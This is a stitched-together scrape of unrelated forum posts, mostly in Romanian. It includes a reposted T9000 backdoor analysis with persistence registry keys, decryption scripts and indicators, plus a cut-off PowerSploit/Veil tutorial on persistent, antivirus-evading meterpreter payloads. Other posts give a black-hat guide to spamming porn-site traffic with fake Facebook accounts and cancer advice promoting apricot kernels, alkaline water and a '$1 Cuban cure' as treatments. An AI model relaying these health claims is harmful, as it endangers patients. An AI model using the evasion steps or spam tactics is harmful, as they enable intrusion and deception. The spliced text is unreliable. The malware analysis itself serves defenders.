victim. The first technique is used if the victim meets the following criteria: Microsoft Windows 8 / Windows Server 2012 R2 DoctorWeb security product installed For this situation, the following registry key is set: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run This ensures that the ResN32.dll library will be run using the ‘Run’ exported function whenever the machine is rebooted. The second technique is used if the victim meets any of the following sets of criteria: Microsoft Windows 8 / Windows Server 2012 R2 Not running Kingsoft, Tencent, or DoctorWeb security products Microsoft Windows XP or lower No security products installed, or running any of the following: Sophos GData TrendMicro AhnLab Kaspersky In these situations, the following persistence technique is used. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1 Setting these registry keys both enables the AppInit_DLL functionality, and ensures that every user mode process that is spawned will load the ResN32.dll library. More information about this can be found here. The third technique is used in any other situation. When this occurs, the malware will first identify the explorer.exe process identifier. It proceeds to inject the ResN32.dll library into this process. At this point, the third stage of the malware family is loaded. Stage 3 The third stage begins when the ResN32.dll file begins operating. This file contains the following debug string: D:\WORK\T9000\ResN_M2\Release\ResN32.pdb The ResN32.dll library begins by spawning a new thread that is responsible for the majority of the capabilities built into this sample. This thread begins by checking the operating system version, and once again runs a query on the various security products installed on the victim machine. Under certain conditions, the following registry key is set, ensuring persistence across reboots: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run Following this, a new thread is created that is responsible for deleting previously written files. This thread creates the following mutex: Global\\deletethread It proceeds to attempt to delete the following files in an infinite loop until said files have been deleted: %STARTUP%\hccutils.dll %STARTUP%\hccutil.dll %STARTUP%\igfxtray.exe The ResN32.dll malware proceeds to read in the ResN32.dat file that was previously written to disk. This file contains a path to the hjwe.dat file, which is subsequently read in. The data within the hjwe.dat file is decrypted using the RC4 algorithm, and subsequently decompressed using the LZMA algorithm. The following script can be used to decrypt the hjwe.dat file, along with the plugins that will be discussed later. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import sys, pylzma from base64 import * from binascii import * from struct import * def rc4( data , key ): S = range(256) j = 0 out = [] for i in range(256): j = (j + S + ord( key[i % len(key)] )) % 256 S , S[j] = S[j] , S i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S ) % 256 S , S[j] = S[j] , S out.append(chr(ord(char) ^ S[(S + S[j]) % 256])) return ''.join(out) f = open(sys.argv[1], 'rb') fd = f.read() f.close() bytes_0_4, bytes_4_8, bytes_8_12, bytes_12_16 = unpack("<IIII", fd[0:16]) if bytes_0_4 == 0xf7e4aa65: length = bytes_8_12 if len(fd)-16 != length: print "[*] Possible error reading in length of data." key_size = 260 key = fd[16:16+key_size] data = fd[16+key_size:] decrypted = rc4(data, key) decompressed = pylzma.decompress_compat(decrypted) f1 = open(sys.argv[1]+".decompressed", 'wb') f1.write(decompressed) f1.close print "[+] Wrote %s" % (sys.argv[1]+".decompressed") After this file has been decrypted and decompressed, it is written to a file in the %TEMP% directory with a file prefix of ‘____RES’. This file, which contains a Windows DLL, is then loaded into the current process. After the malicious library has been loaded, the previously written temporary file is deleted. This begins the last stage of the malware, which will load the core of the malware family. Stage 4 Once the decrypted and decompressed hjwe.dat file is loaded, it begins by checking its parent process against the following list. If the parent process matches the following blacklist, the malicious DLL will exit without performing any malicious activities. winlogon.exe csrss.exe logonui.exe ctfmon.exe drwtsn32.exe logonui.exe explore.exe System Dbgview.exe userinit.exe lsass.exe wmiprvse.exe services.exe inetinfo.exe avp.exe Rtvscan.exe The malware proceeds to collect the username of the victim, as well as the operating system version. It then compares its parent process against the following list of executables: winlogon.exe csrss.exe logonui.exe ctfmon.exe drwtsn32.exe logonui.exe System Dwm.exe QQPCRTP.exe Tasking.exe Taskhost.exe Taskmgr.exe Dbgview.exe suerinit.exe lsass.exe wmiprvse.exe services.exe inetinfo.exe avp.exe Rtvscan.exe Notice the repeated check for the ‘logonui.exe’, as well as the overlap with the previous parent executable check, which implies sloppiness by the malware author. After these checks are performed, the following mutex is created. Global\\{A59CF429-D0DD-4207-88A1-04090680F714} The following folders are then created: utd_CE31 XOLOADER Update The path of these folders is determined by the version of Microsoft Windows running. The following possibilities exist: %ALLUSERSPROFILE%\Documents\My Document\ %PUBLIC%\Downloads\Update\ At this point, the malware will read in the dtl.dat file, which contains configuration data. Data contained with this file starting at offset 0x20 is xor-encrypted using a single-byte key of 0x5F. The following script can be used to extract the IP address and port for the C2 server from this file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 from struct import * import sys, socket def int2ip(addr): return socket.inet_ntoa(pack("!I", addr)) config_file = sys.argv[1] f = open(config_file, 'rb') fd = f.read() f.close() decrypted = "" for x in fd[32:]: decrypted += chr(ord(x) ^ 0x5f) port = unpack("<I", decrypted[4:8])[0] ip = int2ip(unpack(">I", decrypted[8:12])[0]) print "IP Address : %s" % ip print "Port : %d" % port The malware will then read in and parse the included plugin configuration information, which is found within the glp.uin file that was previously dropped. These included plugins are encrypted and compressed using the same method witnessed by the hjwe.dat file previously. The previously included script can be used to decrypt and decompress the following three plugin files: tyeu.dat vnkd.dat qhnj.dat These three plugins are subsequently loaded after being decrypted and decompressed. An overview of these plugins can be found later in this post. The malware proceeds to create the following event: Global\\{34748A26-4EAD-4331-B039-673612E8A5FC} Additionally, the following three mutexes are created: Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E} Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089} Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9} The malware will spawn a new thread to handle network communication. The following event is created prior to this communication occurring: Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} The malware includes proxy support in the event that the victim is behind a web proxy. Network traffic occurs over a binary protocol on the port specified within the configuration. Traffic is xor-encrypted with a single-byte key of 0x55 in an attempt to bypass any network security products that may be in place. Once decrypted, the following traffic is sent by the malware. Figure 1: Decrypted data sent by malware As we can see from the above image, the malware will send out an initial beacon, followed by various collected information from the victim machine. The following information is exfiltrated: Installed security products System time Build Number CPU Architecture (32-bit/64-bit) MAC Address IP Address Hostname Username Parent executable name Plugin configuration information The malware is configured to receive a number of commands. The following command functionalities have been identified. Command Description DIR Directory listing LIR Drive listing RUN Execute command (Either interactively or not) CIT Send command to interactively spawned command CFI Kill interactively spawned process DOW Download file UPL Upload file DEL Delete file DTK Retrieve statistics for file ERR Null command Additionally, the following commands have been identified, however, their functionalities have yet to be fully discovered. PNG PLI PLD FDL OSC OSF SDA QDA TFD SDS SCP FMT STK CRP Plugin #1 – tyeu.dat When this plugin is called with the default exported function, it will create the following mutex: {CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62} When called with the SetCallbackInterface function export, the malicious capabilities of the plugin begin. The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin’s thread. The plugin proceeds to create the following named event: Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} Multiple threads are then spawned to handle various actions. The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files: %PUBLIC%\Downloads\Update\S[random].dat %ALLUSERSPROFILE%\Documents\My Document\S[random].dat The random data is generated via the current system time. Additionally, when a screenshot is written, one of the following log files has data appended to it: %PUBLIC%\Downloads\Update\Log.txt %ALLUSERSPROFILE%\Documents\My Document\Log.txt Figure 2: Example data found within Log.txt file A second thread is responsible for monitoring the foreground window every 20 seconds. The thread will target the window names set within the plugin configuration. In this particular instance, the malware will target the ‘notepad’ process. When this process is discovered to be running in the foreground window, the malware will take a screenshot of this window. The data is compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files: %PUBLIC%\Downloads\Update\W[random].dat %ALLUSERSPROFILE%\Documents\My Document\W[random].dat Like the previous thread, this one attempts to write another log file to the disk. However, due to a bug within the code of this plugin, the malware author attempts to append the ‘C:\\Windows\\Temp\\Log.txt’ string to the path, resulting in an inaccessible file path. In the event this bug did not exist, the following example data would be written: 08:37:49 2000 [4] PrintKeyTitleWnd: ===>> Process ID : 2000 The third and final thread spawned by this plugin is responsible for collecting information from the Skype program. The malware will use the built-in Skype API to accomplish this. This only takes places if both Skype is running and the victim is logged into Skype. It makes calls to the following functions: SkypeControlAPIDiscover SkypeControlAPIAttach When hooking into the Skype API, the victim is presented with the following dialog: Figure 3: Skype API access request The victim must explicitly allow the malware to access Skype for this particular functionality to work. However, since a legitimate process is requesting access, the user may find him- or herself allowing this access without realizing what is actually happening. Once enabled, the malware will record video calls, audio calls, and chat messages. Audio and video files are stored in the following folder: %APPDATA%\Intel\Skype Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder. When decrypted, we can see that the malware periodically takes images of the video calls. Audio calls are stored as .wav files. Figure 4: A lonely malware reverser is captured on video by the malicious plugin The original name for this plugin is ‘CaptureDLL.dll’. This is aptly named, as we see that this plugin has the following functionality: Capture full desktop screenshots Capture window screenshots of targeted processes Capture Skype audio, video, and chat messages Plugin #2 – vnkd.dat The vnkd.dat plugin has the following debug path, leading us to believe that the original name for this plugin is ‘FlashDiskThief’: e:\WORK\Project\T9000\Windows\Target\FlashDiskThief.pdb When loaded with the default DllEntryPoint exported function, it will create the following mutex: Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4} Like the other plugins associated with this malware, the majority of the functionality for this malware resides within the SetCallbackInterface exported function. This function spawns a new thread that begins by registering a new window with a class name and window name of ‘xx’. The plugin proceeds to iterate through all connected drives on the system, looking for removable drives. Figure 5. Plugin check for removable drives Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin’s configured list. In this particular instance, the malware will seek out the following file types: *.doc *.ppt *.xls *.docx *.pptx *.xlsx If one of these file types is found, the malware will create a copy of the file in one of the following paths: %PUBLIC%\Downloads\Update\D[random].tmp %ALLUSERSPROFILE%\Documents\My Document\D[random].tmp The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below. Figure 6: File structure prior to decryption Figure 7: File structure post decryption This concludes the functionality of the vnkd.dat plugin, or FlaskDiskThief as it’s known by the malware’s author. While specific in nature, this plugin allows attackers to collect files being passed around from one machine to another via removable drives. Plugin #3 – qhnj.dat This particular plugin appears to have an original filename of ‘kplugin.dll’ due to debugging information found within the file. The qhnj.dat plugin is responsible for hooking a number of common Microsoft Windows API calls, and logging the results. The following functions are hooked by this plugin: ImmGetCompositionStringA ImmGetCompositionStringW CreateFileW DeleteFileW CopyFileExW MoveFileWithProgressW CreateDirectoryW CreateDirectoryExW RemoveDirectoryW GetClipboardData CryptEncrypt CryptDecrypt The plugin is most likely hooking the ImmGetCompositionString* functions in order to collect information about Unicode characters on the victim machine, such as Chinese, Japanese, and Korean. Hooking the various file and directory operations allows the malware to log what file changes are occurring on the system. When a file is created, copied, moved, or deleted on the system, the malware will check the directory of said file against the following blacklist: \\\\.\\ :\\program files\\ \\AppData\\ \\temporary internet files\\ \\application data\\ \\Local Settings\\ \\cookies\\ \\temp\\ \\history\\ Additionally, the filename is compared against the ‘.tmp’ extension to ensure a temporary file is ignored. Should the file meet the required criteria, this data is logged. Additionally, all folder modifications and clipboard data are logged as well. The Crypt* functions allow the malware to collect sensitive encrypted data sent to and from the victim machine. This is especially useful when viewing network traffic, allowing the attackers to potentially gain access to remote systems used by the victim. All of the data logged by the qhnj.dat plugin file is stored in one of the following file paths. Data is encrypted using a single-byte XOR key of 0x79. %PUBLIC%\Downloads\Update\uai[random].tmp %ALLUSERSPROFILE%\Documents\My Document\uai[random].tmp This last plugin allows the attackers to record important actions taken by the victim, which in turn may allow them to gain additional access as well as insight into the victim’s actions. Conclusion T9000 appears to be the latest version of this Trojan, which has been partially exposed in previous reports. In 2013, Cylance published a report on a group they named “Grand Theft Auto Panda”, which includes some details on the T5000 version of this Trojan. FireEye researchers also noted that the malware was used in an attack in 2014 using a lure related to the disappearance of Malaysian flight MH370. The author of this backdoor has gone to great lengths to avoid being detected and to evade the scrutiny of the malware analysis community. We hope that sharing the details of how this tool works as well as the indicators in the section below will help others defend themselves against attacks using this tool. In a future report, we will detail the infrastructure used by the variants of the malware we have identified and discuss the methods attackers use to infect systems with it. Palo Alto Networks customers are protected from T9000/T5000 attacks through our next-generation security platform, including the following. Threat Prevention signatures for the software vulnerabilities listed in this report are available to detect the exploit files during delivery. Traps is capable of preventing exploitation of the vulnerabilities exploited to install T9000. WildFire classifies all of the malware described in this report as malicious. Anti-malware signatures for the files listed in this report. AutoFocus users can identify the malware discussed in this report with the T5000 tag Indicators of Compromise Hashes RTF File, d5fa43be20aa94baf1737289c5034e2235f1393890fb6f4e8d4104565be52d8c QQMGr.dll, bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f QQMGR.inf, ace7e3535f2f1fe32e693920a9f411eea21682c87a8e6661d3b67330cd221a2a ResN32.dat, aa28db689f73d77babd1c763c53b3e63950f6a15b7c1a974c7481a216dda9afd ResN32.dll, 1cea4e49bd785378d8beb863bb8eb662042dffd18c85b8c14c74a0367071d9a7 hqwe.dat, bb73261072d2ef220b8f87c6bb7488ad2da736790898d61f33a5fb7747abf48b hqwe.dat.decrypted, 7daf3c3dbecb60bee3d5eb3320b20f2648cf26bd9203564ce162c97dcb132569 hccutils.dll, 3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9 hccutils.inf, f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27 igfxtray.exe, 21a5818822a0b2d52a068d1e3339ed4c767f4d83b081bf17b837e9b6e112ee61 qhnj.dat, c61dbc7b51caab1d0353cbba9a8f51f65ef167459277c1c16f15eb6c7025cfe3 qhnj.dat.decrypted, 2b973adbb2addf62cf36cef9975cb0193a7ff0b960e2cff2c80560126bee6f37 tyeu.dat, e52b5ed63719a2798314a9c49c42c0ed4eb22a1ac4a2ad30e8bfc899edcea926 tyeu.dat.decrypted, 5fc3dc25276b01d6cb2fb821b83aa596f1d64ae8430c5576b953e3220a01d9aa vnkd.dat, c22b40db7f9f8ebdbde4e5fc3a44e15449f75c40830c88932f9abd541cc78465 vnkd.dat.decrypted, 157e0a9323eaaa911b3847d64ca0d08be8cd26b2573687be461627e410cb1b3f dtl.dat, 00add5c817f89b9ec490885be39398f878fa64a5c3564eaca679226cf73d929e glp.uin, 3fa05f2f73a0c44a5f51f28319c4dc5b8198fb25e1cfcbea5327c9f1b3a871d4 Mutexes 820C90CxxA1B084495866C6D95B2595xx1C3 Global\\deletethread Global\\{A59CF429-D0DD-4207-88A1-04090680F714} Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E} Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089} Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9} {CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62} Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4} Named Events Global\\{34748A26-4EAD-4331-B039-673612E8A5FC} Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E} File Modifications %TEMP%\~tmp.doc %APPDATA%\Intel\avinfo %APPDATA%\Intel\Data\dtl.dat %APPDATA%\Intel\Data\glp.uin %APPDATA%\Intel\Data\ %APPDATA%\Intel\~1 %APPDATA%\Intel\hccutils.dll %APPDATA%\Intel\hccutils.inf %APPDATA%\Intel\hjwe.dat %APPDATA%\Intel\igfxtray.exe %APPDATA%\Intel\qhnj.dat %APPDATA%\Intel\QQMgr.dll %APPDATA%\Intel\QQMgr.inf %APPDATA%\Intel\ResN32.dll %APPDATA%\Intel\ResN32.dat %APPDATA%\Intel\tyeu.dat %APPDATA%\Intel\vnkd.dat %STARTUP%\hccutils.dll %STARTUP%\hccutil.dll %STARTUP%\igfxtray.exe %ALLUSERSPROFILE%\Documents\My Document\utd_CE31 %ALLUSERSPROFILE%\Documents\My Document\XOLOADER %ALLUSERSPROFILE%\Documents\My Document\update %ALLUSERSPROFILE%\Documents\My Document\Log.txt %PUBLIC%\Downloads\Update\utd_CE31 %PUBLIC%\Downloads\Update\XOLOADER %PUBLIC%\Downloads\Update\update %PUBLIC%\Downloads\Update\Log.txt %APPDATA%\Intel\Skype Registry Modifications HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run Command and Control 198.55.120[.]143:8080 Sursa: http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

te apuci de facut filme, e foarte bine sa ai continut unic :)))

Metoda free: webhost si subdomeniu (puteti folosi domeniu daca aveti) de la easyxsites, pentru a converti traficul folosim plugrush si imagetwist. Metode de trafic: A) 000webhost + wordpress + wprobot + nextscripts configurat sa posteze pe vbulletin cate o poza cu href spre site-ul tau + poti folosi si tumblr si alte servicii (nu uita sa pui si hashtag-uri pentru alte servicii) Spam pe chat-ul de la imagefap (direct cu site-ul vostru sau urcati imagini cu watermark si le puneti pe chaturile lor), pentru mailuri folositi yopmail.com. C) Facebook fake account cu pizda buna, intrati pe grupuri pe facebook si pune-ti poze cu add me, strangeti multi prieteni / followeri si transformati cont-ul in pagina. D) Mai incercati metodele de mai sus. E) Cautati pe google "milf tumblr.com" (sau orice alt keyword) si faceti o lista cu site-urile gasite iar la sfarsit adaugati /rss (ex: muie.tumblr.com/rss) + faceti blog pe tumblr e.x: "milf next door" (fiti cat mai unici). Pasul urmator, cont pe https://ifttt.com/ si facem recipiente cu rss + tumblr si adaugam aici lista de rss-uri facute + punem hashtaguri care au acceasi legatura cu nisa, iar la descriere, desigur link la site-ul nostru. Links: https://www.plugrush.com/?ref=20013 (ref) easyXsites - Your Free Adult Host (non ref) ImageTwist - Free Image Hosting, Photo sharing & Earn Money (non ref) https://www.plugrush.com (non ref) Simplu si scurt, cautati pe google alte site-uri porn sa vedeti cum isi promoveaza alte persoane site-ul lor si faceti si voi acceasi chestie. Link-uri care te pot ajuta: http://www.blackhatworld.com/blackhat-seo/making-money/747458-methods-getting-targetted-visitors-your-adult-cpa-site-traffic-sources.html http://www.blackhatworld.com/blackhat-seo/making-money/801786-method-my-webcam-method-making-600-month.html

Aici sunt toate: https://shop.sitepoint.com/ Dar cele care au mai multa tangenta cu tema forum-ului, sunt: https://shop.sitepoint.com/sales/it-security-and-ethical-hacking https://shop.sitepoint.com/sales/pay-what-you-want-white-hat-hacker-bundle https://shop.sitepoint.com/sales/cyber-security-bundle https://shop.sitepoint.com/sales/datacenters-penetration-testing-bundle https://shop.sitepoint.com/sales/zenmate-lifetime-subscription

Cartele gratuite de la Lycamobile. Fiecare cartela are 1€ credit ce poate fi folosit 30 zile. Tarife: http://www.lycamobile.ro/ro/internationalrates Am comandat si eu o cartela a ajuns in 3 zile prin posta. Link pentru comanda cartela: http://www.lycamobile.ro/ro/free-sim-request Are acoperire in toata tara si apeluri ieftine in strainatate.

Iti apare in site tot, trebuie sa vezi cu8m functioneaza un magazin online inainte de toate... Sunt multe platforme, la inceput am lucrat cu Drupal apoi OpenCart dar am ajuns la concluzia ca nu am nevoie de mai mult decat un wordpress + woocommerce. Cauta tutoriale wordpress+ woocommerce si o sa gsesti. Numarul de card nu se stocheaza la tine...ci la providerul unde face plata, gen paypal.

Lasand la o parte promotia, e foarte utila pentru cei care vor sa sune in strainatate si din cate stiu eu se poate folosi si in alte tari (nu stiu in ce conditii/tarife).

@sleed pt cancer de san s-a inventat leac in Cuba costa 1$ acolo . Pe langa ce a insirat alexu , turmericul mai este bun. A se renunta complet la carne . Din foarte multe studii si exemple de cazuri care apar tot mai des pe net , uleiul de cannabis este extraordinar . Lemongrass ,papadia.

@sleed i-am luat multe lucruri si nu doar dintr-un singur loc. Le scriu pe aici poate sunt de folos si pentru altii si pentru a nu uita ce i-am cumparat, asa cum am uitat si acum sa scriu si de miez samburi caise, amari. BioGreens, uleiul de cocos, catina si alte lucruri, le-am luat de la Farmacia Tei, pentru ca au cele mai mici preturi din online si offline. De multe ori au preturi mai mici chiar si decat daca ai cumpara direct de la producator. De exemplu, la producator BioGreens costa 99 de lei, iar la FT 77,5. La doua cutii am scutit 43 de lei. O cutie de Hepatoprotect Forte costa la farmacia de langa mine 16 lei, iar la FT doar 8 lei. Pe lucrurile pe care i le-am luat ultima data de la FT am dat 415 lei, iar daca le cumparam din comert cred ca plateam aproape dublu. OxyE - supliment pentru oxigenarea celulelor - l-am luat din SUA, de pe Amazon (pachetul de 5), pentru ca nu era pe stoc in Europa. Miez samburi caise, amari (pentru Vitamina B17) i-am luat de pe driedfruits.ro. Sunt foarte draguti cei de acolo, pentru ca indiferent de ce suma cumpar, mereu iti trimit si cate un cadou. De acolo i-am luat si aloe vera + afine. Vitamina C 1000 + Zn - Dr Hart - Vitamina C de foarte buna calitate, de la farmacia Punkt, pentru ca acolo o gasesc si are cel mai mic pret (11 lei si ceva). Aparatul de alcalinizare apa - hunza.ro Unii sunt acord cu el, altii nu. Eu spun ca-i face bine si este un element important in lupta impotriva cancerului. Purificator aer (ionizare) - l-am luat de pe famtastic.ro. Chiar daca a venit din afara tarii, tot a costat mai putin decat ceea ce gaseam pe la noi. Functioneaza non-stop de cand i l-am cumparat, este fiabil (nemtesc), nu consuma mult, nu-i zgomotos. In rest, multe fructe (rodii, lamai, grapefruit) si legume (broccoli). Toate astea pentru alcalinizarea corpului, pentru oxigenarea sangelui, deoarece cancerul nu poate exsta intr-un mediu alcalin, asa cum a spus Otto Warburg, castigator al Premiului Nobel. M-a mai rugat cineva pe privat sa-i fac o lista cu tot ceea ce i-am cumparat, insa, exact ca atunci, sunt singur ca am omis unele lucruri, pentru nu le mai tin minte pe toate. Sper sa-ti fie de folos si sa se faca bine ruda ta. Daca ai nelamuriri, imi poti scrie pe privat.

Daca te rog frumos @alexu , poti sa imi recomanzi te rog un magazin de unde ai luat produsele ? Am si eu pe cineva in familie, care are cancer de san si vreau sa ii recomand ..

Astazi a fost la inca o sedinta de radioterapie, asa cum merge in fiecare zi, in afara de weekend si de momentele in care aparatul ala se strica, pentru ca s-a mai defectat de cateva ori. Mai are inca vreo sapte sedinte. Eu ziceam ca-s multe 25, insa am discutat astazi cu un om care era si el acolo pentru tratament si el avea de facut 75. Nu arata deloc bine omul ala, probabil avea ceva si mai grav. Tata este bine in continuare, in afara de acele momente cand ii este sila de la citostatice si mai este usor deranjat la stomac de la radiatii. A inceput si sa-i cada parul, insa nu asta-i vreo mare problema. A venit o ruda din provincie pe la noi si nu i-a venit sa creada cat de bine arata. Se astepta sa fie cu mult mai rau, mai ales ca ne spusese ca nu stiu cine a murit la doua luni de la operatia de cancer de colon. Normal ca este bine, ca-l indop in fiecare zi cu o multime de lucruri bune, luate cu ajutorul vostru. Apropo de lucruri bune: imi pare rau ca a disparut tot ceea ce am scris, incepand cu ianuarie, deoarece ati schimbat platforma (care arata bine) pentru ca poate anumite lucruri le erau de folos si altora care se afla intr-o situatie asemanatoare. Doua chestii importante pentru cei bolnavi de cancer, pe care i le-am luat tatalui meu: 1. Uleiul de cocos, despre care cercetatorii Universitatii din Adelaide afirma ca, in testele de laborator, a omorat 93% dintre celulele cancerului de colon, in doua zile. Prima data i-am pus in ceaiul de somn, insa nu i-a placut, asa ca acum ii pun doua lingurite, in fiecare zi, pe o felie de paine buna (fara E-uri sau conservanti). 2. BioGreens, pentru ca graul verde, zic ei, "Reduce toxicitatea asociata radiatiilor si chimioterapiei". Ii pun un plic intr-o cana mare (350 ml) de ceai concentrat de catina. Pe langa toate astea, ii dau in continuare OxyE (a inceput al treilea tub) apa alcalina, Omega 3,6,9, fructe. De la chestiile de mai sus se simte si arata bine, pentru ca altfel il distrugeau radiatiile si chimicalele, mai ales ca era slabit rau dupa cele doua operatii importante. Apropo de operatii: se refac bine. Cea de la plamanul drept este o taietura de vreo 10 cm, la subsuoara, insa este mica in comparatie cu operatia de la colon. Sper sa termine cu radioterapia si sper sa termine si cu chimicalele alea puternice. La cinci luni de la incepera tratamentului va face iar tomograf, adica prin martie. Atunci, sper sa spuna ca-i bine si ca nu mai trebuie sa ia nici un fel de tratament. Sa continue cu lucrurile astea naturiste.

Outlook Password Decryptor Outlook stores the password for subsequent logins when user selects the 'Remember Password' option during authentication. The password is stored in the encrypted format and only respective user can decrypt the password. Outlook Password Decryptor can instantly decrypt and recover all these account passwords. For command-line version, check out our new tool - Outlook Password Dump. Note: Outlook Password Decryptor is not hacking or cracking tool as it can only help you to recover your own lost password that is previously stored in your system. Outlook Password Decryptor can recover passwords from all versions beginning with Outlook Express to latest version, Outlook 2015. It works on wide range of platforms starting from Windows XP to new Windows 10 version. Features Outlook Password Decryptor is the all-in-one tool to recover passwords from all versions of Outlook. Also it can decrypt passwords from different type of Email account configurations supported by Outlook, such as Exchange Server IMAP POP3 SMTP LDAP HTTP On starting, it automatically detects the current Outlook version along with user & platform information. It also provides option to save the recovered password list to HTML/TEXT /XML/CSV file for future use. Link: http://securityxploded.com/outlookpassworddecryptor.php

How-To: Post-Ex Persistence Scripting with PowerSploit & Veil Many penetration testers within the security industry state that getting a system shell is just the starting point for an attack. Sure, I agree, and quite possibly the most significant tenets of our craft could be post exploitation - specifically, the act of maintaining a persistent connection while remaining intimately covert against defense mechanisms. Historically, the act of evading antivirus and/or malware detection has been a perpetual struggle between those that detect and those that evade. We could use code packing, obfuscating and staged multipart net IO based payloads, to name a few. Enter Microsoft, as they tipped the scales in favor of the evaders by introducing the PowerShell scripting language. The PowerShell language was first introduced as version 1.0 with the advent of Microsoft XP SP2/SP3. Additionally, the PowerShell scripting language, although full-featured, is considered a whitelisted application for the purpose of running various local and/or network based functions; therefore, it remains undetected by antivirus software. A number of well-authored PowerShell tutorials exist on the Internet, providing everything necessary to get underway rather quickly. However, although I vehemently support the pedantic study of programming languages, we don’t really need to touch code to establish an effective piece of PowerShell. To further prove the point, this is a quick post to simply document the necessary steps needed to create a persistent PowerShell communication channel using both the PowerSploit and Veil frameworks. This technique will leverage Veil to generate a PowerShell encoded meterpreter payload. Immediately following, the PowerSploit framework will be used to create a PowerShell wrapper that can be executed on the victim machine in order to maintain the persistent connection. Further information regarding the frameworks used within this post can be referenced here: PowerSploit: https://github.com/mattifestation/PowerSploit Veil: https://github.com/veil-evasion/Veil I would also like to thank my colleague, Dan Kottmann, for his assistance and expertise while debugging code/execution gremlins. Lab Environment The lab environment used to stage this exploitation scenario was comprised of the following three systems, all of which were virtualized guests running within an Ubuntu 12.04 (64 arch) host system. Kali Linux (32 Arch) – Attacking System #1 (Primary) Windows 7 (64 Arch) – Attacking System #2 (Supporting) Windows 7 (32 Arch) – Victim System Additionally, the following diagram illustrates the network architecture and the progression of the attack sequence. The procedure takes into consideration that you have already gained an initial meterpreter shell on the victim system and that we are proceeding with post-exploitation from this point on. First Step – Create meterpreter payload using Veil. Second Step – Place Veil payload into PowerSploit and generate new payload. Third Step – Use the existing meterpreter session to upload the new PowerShell script. Fourth Step – Relax and enjoy the persistent connection. Installing Veil The easiest method to install the Veil framework is to simply perform a “git clone” fromChris Truncer’s GitHub code repository within a Kali Linux operating system. There are specific installation details on his GitHub site, but essentially he provides a “setup.py” script that will install the necessary dependencies. A successfully installed instance of the Veil framework should return something similar to the following screenshot upon typingpython /usr/share/veil/Veil.py. Installing PowerSploit The next step is to download the PowerSploit archive from the GitHub code repository and install it within the Microsoft Windows 7 (64 Arch) attacking system. The following series of commands will provide adequate details for installing the framework. Note that we will need administrative privileges for the following steps. Get the value of the “PSModulePath” environmental variable. C:\Users\labrat>set ---- PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ Decompress the downloaded PowerSploit archive and place it in the previously identified PowerShell Modules directory. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>move C:\Users\labrat\Downloads\PowerSploit-master . 1 dir(s) moved. C:\Windows\System32\WindowsPowerShell\v1.0\Modules>dir Volume in drive C has no label. Volume Serial Number is 0CA4-867A Directory of C:\Windows\System32\WindowsPowerShell\v1.0\Modules 12/04/2013 11:24 AM <DIR> . 12/04/2013 11:24 AM <DIR> .. 12/04/2013 11:18 AM <DIR> PowerSploit-master 07/14/2009 12:32 AM <DIR> PSDiagnostics 07/14/2009 12:37 AM <DIR> TroubleshootingPack 0 File(s) 0 bytes 5 Dir(s) 12,084,989,952 bytes free Enter into the PowerShell scripting environment and set the execution policy to “Unrestricted” so that we can execute our PowerSploit scripts. C:\Users\labrat>powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. PS C:\Users\labrat> PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules> Set-ExecutionPolicy Unrestricted Finally, import the PowerSploit “Persistence” module and answer “Run” if prompted with a warning. PS C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit-master\PowerSploit-master> Import-Module .\Persistence Security Warning Run only scripts that you trust. While scripts from the Internet can be useful, this script can potentially harm your computer. Do you want to run 